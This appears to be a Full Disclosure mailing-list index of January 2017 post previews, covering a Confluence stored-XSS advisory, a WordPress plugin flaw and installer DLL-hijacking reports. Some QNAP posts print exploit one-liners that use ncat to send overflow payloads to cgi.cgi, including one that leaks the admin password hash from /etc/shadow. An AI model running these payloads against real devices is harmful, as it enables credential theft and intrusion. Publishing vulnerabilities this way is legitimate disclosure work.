Posted by jlss on Jan 06
Sorry, the right title is:
Persisted Cross-Site Scripting (XSS) in Confluence Software
Full Disclosure
Posted by David Black on Jan 06
Just to clarify, the issue only affects Confluence versions < 5.10.6.
You can find the original bug report at
https://jira.atlassian.com/browse/CONF-43162.
Posted by dxw Security on Jan 04
Details
================
Software: Stop User Enumeration
Version: 1.3.4
Homepage: https://wordpress.org/plugins/stop-user-enumeration/
Advisory report: https://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)
Description
================
Stop User Enumeration does not stop user enumeration
Vulnerability
================
Traditionally user…
Posted by Moritz Naumann on Jan 04
Hi Jodson,
On 03.01.2017 at 19:50, jlss wrote:
your advisory mentions both Confluence and JIRA, which, as far as I
know, are separate Atlassian products.
Are both affected?
Thanks for clarifying,
Moritz
Posted by Stefan Kanthak on Jan 03
Hi @ll,
the executable installer “InstallTinyPDF.exe”, available from
<http://tinypdf.com/downloads.html>, is (surprise.-) vulnerable:
1. DLL hijacking (this is well-known and well-documented; see
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>
<https://capec.mitre.org/data/definitions/471.html>,
<…
Posted by Stefan Kanthak on Jan 03
Hi @ll,
the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.
The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory “%TEMP%\7zSxxxxxxxx\” to extract
its payload, then executes “%TEMP%\7zSxxxxxxxx\spsetup.exe”.
“%TEMP%\7zSxxxxxxxx\” inherits the NTFS access rights…
Posted by bashis on Jan 03
Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)
[Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ;
echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***…
Posted by bashis on Jan 03
And also;
==================
[Stack overflow]
==================
[Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en
"QUJCQkI="` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443
HTTP/1.1 200 OK
Date: Mon, 02 Jan 2017 11:59:24 GMT
Content-Length: 0
Connection: close
Content-Type: text/plain
[Remote Host]#
====
[Local Host]# dmesg | grep…
Posted by bashis on Jan 03
Greetings,
Twice I tried to use the QNAP Web page (https://aid.qnap.com/event/_module/nas/safe_report/) for reporting
vulnerability, and twice I got mailer-daemon back.
So, I’ll post my vulnerabilities here instead (Was not meant to be 0-day… whatever).
Have a nice day (and happy new year)
/bashis
==================
1) [Heap overflow]
==================
Path: /home/httpd/cgi-bin/cgi.cgi
u = valid user [guest|admin]
1.1)
/* Remote */…
Posted by jlss on Jan 03
=====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]==============
Persisted Cross-Site Scripting (XSS) in Confluence Jira Software
----------------------------------------------------------------
Author(s):
- Jodson Santos
- jodson.santos () tempest com br
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents ]=====================================================
1….